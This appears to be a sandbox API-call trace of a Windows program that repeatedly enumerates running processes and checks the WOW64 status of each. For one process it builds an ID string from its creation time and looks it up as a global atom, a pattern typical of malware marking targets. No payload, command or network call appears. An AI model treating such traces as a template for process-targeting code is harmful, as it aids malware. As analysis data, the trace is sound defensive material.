	[0101.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x47c
	[0101.285] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.285] CloseHandle (hObject=0x47c) returned 1
	[0101.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x47c
	[0101.285] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.285] CloseHandle (hObject=0x47c) returned 1
	[0101.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x47c
	[0101.286] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.286] CloseHandle (hObject=0x47c) returned 1
	[0101.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x47c
	[0101.286] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.286] CloseHandle (hObject=0x47c) returned 1
	[0101.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x47c
	[0101.286] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.286] CloseHandle (hObject=0x47c) returned 1
	[0101.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x47c
	[0101.286] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.286] CloseHandle (hObject=0x47c) returned 1
	[0101.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x47c
	[0101.286] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.286] CloseHandle (hObject=0x47c) returned 1
	[0101.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x47c
	[0101.287] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.287] CloseHandle (hObject=0x47c) returned 1
	[0101.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x47c
	[0101.287] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.287] CloseHandle (hObject=0x47c) returned 1
	[0101.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x47c
	[0101.287] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.287] CloseHandle (hObject=0x47c) returned 1
	[0101.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x47c
	[0101.287] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.287] CloseHandle (hObject=0x47c) returned 1
	[0101.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x47c
	[0101.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.288] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.288] GetProcessTimes (in: hProcess=0x47c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.288] wsprintfA (in: param_1=0x68f2d0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.289] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.289] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.289] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.289] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.289] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.289] CloseHandle (hObject=0x47c) returned 1
	[0101.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x47c
	[0101.289] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.290] CloseHandle (hObject=0x47c) returned 1
	[0101.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x47c
	[0101.290] IsWow64Process (in: hProcess=0x47c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.290] CloseHandle (hObject=0x47c) returned 1
	[0101.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x4a0
	[0101.360] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.360] CloseHandle (hObject=0x4a0) returned 1
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x4a0
	[0101.360] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.360] CloseHandle (hObject=0x4a0) returned 1
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x4a0
	[0101.361] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.361] CloseHandle (hObject=0x4a0) returned 1
	[0101.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x4a0
	[0101.361] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.361] CloseHandle (hObject=0x4a0) returned 1
	[0101.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x4a0
	[0101.361] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.361] CloseHandle (hObject=0x4a0) returned 1
	[0101.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x4a0
	[0101.361] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.361] CloseHandle (hObject=0x4a0) returned 1
	[0101.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x4a0
	[0101.361] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.361] CloseHandle (hObject=0x4a0) returned 1
	[0101.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x4a0
	[0101.362] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.362] CloseHandle (hObject=0x4a0) returned 1
	[0101.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x4a0
	[0101.363] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.363] CloseHandle (hObject=0x4a0) returned 1
	[0101.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x4a0
	[0101.363] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.363] CloseHandle (hObject=0x4a0) returned 1
	[0101.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x4a0
	[0101.363] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.363] CloseHandle (hObject=0x4a0) returned 1
	[0101.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x4a0
	[0101.363] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.363] CloseHandle (hObject=0x4a0) returned 1
	[0101.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x4a0
	[0101.363] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.363] CloseHandle (hObject=0x4a0) returned 1
	[0101.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x4a0
	[0101.364] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.364] CloseHandle (hObject=0x4a0) returned 1
	[0101.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x4a0
	[0101.364] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.364] CloseHandle (hObject=0x4a0) returned 1
	[0101.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x4a0
	[0101.364] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.364] CloseHandle (hObject=0x4a0) returned 1
	[0101.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x4a0
	[0101.364] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.364] CloseHandle (hObject=0x4a0) returned 1
	[0101.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x4a0
	[0101.364] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.364] CloseHandle (hObject=0x4a0) returned 1
	[0101.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x4a0
	[0101.365] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.365] CloseHandle (hObject=0x4a0) returned 1
	[0101.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x4a0
	[0101.365] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.365] CloseHandle (hObject=0x4a0) returned 1
	[0101.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x4a0
	[0101.365] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.365] CloseHandle (hObject=0x4a0) returned 1
	[0101.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x4a0
	[0101.365] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.365] CloseHandle (hObject=0x4a0) returned 1
	[0101.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x4a0
	[0101.366] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.366] CloseHandle (hObject=0x4a0) returned 1
	[0101.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x4a0
	[0101.366] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.366] CloseHandle (hObject=0x4a0) returned 1
	[0101.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x4a0
	[0101.366] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.366] CloseHandle (hObject=0x4a0) returned 1
	[0101.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x4a0
	[0101.366] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.366] CloseHandle (hObject=0x4a0) returned 1
	[0101.366] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x4a0
	[0101.366] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.366] CloseHandle (hObject=0x4a0) returned 1
	[0101.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x4a0
	[0101.367] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.367] CloseHandle (hObject=0x4a0) returned 1
	[0101.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x4a0
	[0101.367] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.367] CloseHandle (hObject=0x4a0) returned 1
	[0101.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x4a0
	[0101.367] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.367] CloseHandle (hObject=0x4a0) returned 1
	[0101.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x4a0
	[0101.367] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.367] CloseHandle (hObject=0x4a0) returned 1
	[0101.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x4a0
	[0101.368] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.368] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.368] GetProcessTimes (in: hProcess=0x4a0, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.368] wsprintfA (in: param_1=0x700e68, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.369] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.369] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.369] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.369] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.369] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.369] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.369] CloseHandle (hObject=0x4a0) returned 1
	[0101.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x4a0
	[0101.370] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.370] CloseHandle (hObject=0x4a0) returned 1
	[0101.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x4a0
	[0101.370] IsWow64Process (in: hProcess=0x4a0, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.370] CloseHandle (hObject=0x4a0) returned 1
	[0101.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0101.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0101.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0101.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0101.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0101.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x520
	[0101.472] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.473] CloseHandle (hObject=0x520) returned 1
	[0101.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x520
	[0101.473] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.473] CloseHandle (hObject=0x520) returned 1
	[0101.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x520
	[0101.473] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.473] CloseHandle (hObject=0x520) returned 1
	[0101.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x520
	[0101.474] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.474] CloseHandle (hObject=0x520) returned 1
	[0101.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x520
	[0101.474] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.474] CloseHandle (hObject=0x520) returned 1
	[0101.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x520
	[0101.474] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.474] CloseHandle (hObject=0x520) returned 1
	[0101.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x520
	[0101.474] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.474] CloseHandle (hObject=0x520) returned 1
	[0101.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x520
	[0101.474] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.474] CloseHandle (hObject=0x520) returned 1
	[0101.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x520
	[0101.475] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.475] CloseHandle (hObject=0x520) returned 1
	[0101.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x520
	[0101.475] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.475] CloseHandle (hObject=0x520) returned 1
	[0101.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x520
	[0101.475] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.475] CloseHandle (hObject=0x520) returned 1
	[0101.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x520
	[0101.475] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.475] CloseHandle (hObject=0x520) returned 1
	[0101.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x520
	[0101.476] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.476] CloseHandle (hObject=0x520) returned 1
	[0101.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x520
	[0101.476] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.476] CloseHandle (hObject=0x520) returned 1
	[0101.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x520
	[0101.476] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.476] CloseHandle (hObject=0x520) returned 1
	[0101.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x520
	[0101.476] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.476] CloseHandle (hObject=0x520) returned 1
	[0101.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x520
	[0101.476] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.476] CloseHandle (hObject=0x520) returned 1
	[0101.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x520
	[0101.477] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.477] CloseHandle (hObject=0x520) returned 1
	[0101.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x520
	[0101.477] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.477] CloseHandle (hObject=0x520) returned 1
	[0101.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x520
	[0101.477] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.477] CloseHandle (hObject=0x520) returned 1
	[0101.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x520
	[0101.477] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.477] CloseHandle (hObject=0x520) returned 1
	[0101.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x520
	[0101.477] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.477] CloseHandle (hObject=0x520) returned 1
	[0101.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x520
	[0101.478] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.478] CloseHandle (hObject=0x520) returned 1
	[0101.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x520
	[0101.478] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.478] CloseHandle (hObject=0x520) returned 1
	[0101.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x520
	[0101.478] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.478] CloseHandle (hObject=0x520) returned 1
	[0101.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x520
	[0101.478] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.478] CloseHandle (hObject=0x520) returned 1
	[0101.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x520
	[0101.478] IsWow64Process (in: hProcess=0x520, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.478] CloseHandle (hObject=0x520) returned 1
	[0101.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x520
